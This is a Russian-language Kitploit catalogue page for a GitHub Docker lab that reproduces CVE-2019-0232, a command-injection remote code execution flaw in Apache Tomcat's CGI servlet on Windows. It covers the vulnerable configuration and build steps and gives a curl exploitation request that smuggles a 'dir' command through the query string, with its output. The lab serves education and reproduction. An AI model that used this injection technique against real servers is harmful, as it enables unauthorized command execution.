Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Preproduce-CVE-2019-0232 — Лабораторная среда на основе Docker для воспроизведения CVE-2019-0232, уязвимости удаленного выполнения кода в Apache Tomcat CGI Servlet на Windows, с примерами эксплуатации. | Kitploit
Инструменты/GitHubGitHub/luongchivi/preproduce-cve-2019-0232
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubluongchivi/preproduce-cve-2019-0232

Preproduce-CVE-2019-0232

Лабораторная среда на основе Docker для воспроизведения CVE-2019-0232, уязвимости удаленного выполнения кода в Apache Tomcat CGI Servlet на Windows, с примерами эксплуатации.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 месяц назадЕщё не проверено

CVE-2019-0232 - Удаленное выполнение кода через CGI-сервлет Apache Tomcat

Этот репозиторий предоставляет лабораторную среду на основе Docker для воспроизведения уязвимости CVE-2019-0232 в Apache Tomcat 9.0.17 на Windows.

Обзор уязвимости

CVE-2019-0232 — это уязвимость удаленного выполнения кода в CGI-сервлете Apache Tomcat при работе на Windows. Проблема возникает из-за некорректной обработки аргументов командной строки, когда параметр enableCmdLineArguments установлен в true. Злоумышленник может передать произвольные аргументы CGI-скрипту через строку запроса, что приводит к выполнению системных команд.

  • Затронутые версии: Apache Tomcat 9.0.0.M1 — 9.0.17
  • Исправленные версии: 9.0.18 и новее
  • Необходимые условия:
    • Операционная система Windows
    • enableCmdLineArguments=true в конфигурации CGI-сервлета
    • CGI-сервлет включен и привязан к шаблону URL

Лабораторная среда

Структура каталогов

root@kitploit:~
tomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
	├── apache-tomcat-9.0.17-windows-x64.zip
    └── apache-tomcat-9.0.17
        ├── conf
        │   └── context.xml              ← (privileged="true")
        └── webapps
            └── ROOT
                └── WEB-INF
                    ├── web.xml           ← (CGI configuration)
                    └── cgi-bin
                        └── test.bat      ← (.bat script)

Файлы конфигурации

  • context.xml: Устанавливает privileged="true", чтобы разрешить веб-приложению использовать CGI-сервлет.
  • web.xml: Определяет CGI-сервлет с enableCmdLineArguments=true и привязывает его к /cgi-bin/*.
  • test.bat: Простой пакетный скрипт, возвращающий приветственное сообщение.

Начало работы

Предварительные требования

  • Docker (режим контейнеров Windows)
  • Docker Compose

Сборка и запуск

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

Эксплуатация

root@kitploit:~
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"

Welcome to CGI Test Page
 Volume in drive C has no label.
 Volume Serial Number is 3E70-7C38

 Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin

07/12/2026  11:45 AM    <DIR>          .
07/12/2026  11:45 AM    <DIR>          ..
07/12/2026  12:25 PM                78 test.bat
               1 File(s)             78 bytes
               2 Dir(s)  136,027,971,584 bytes free
Скачать инструмент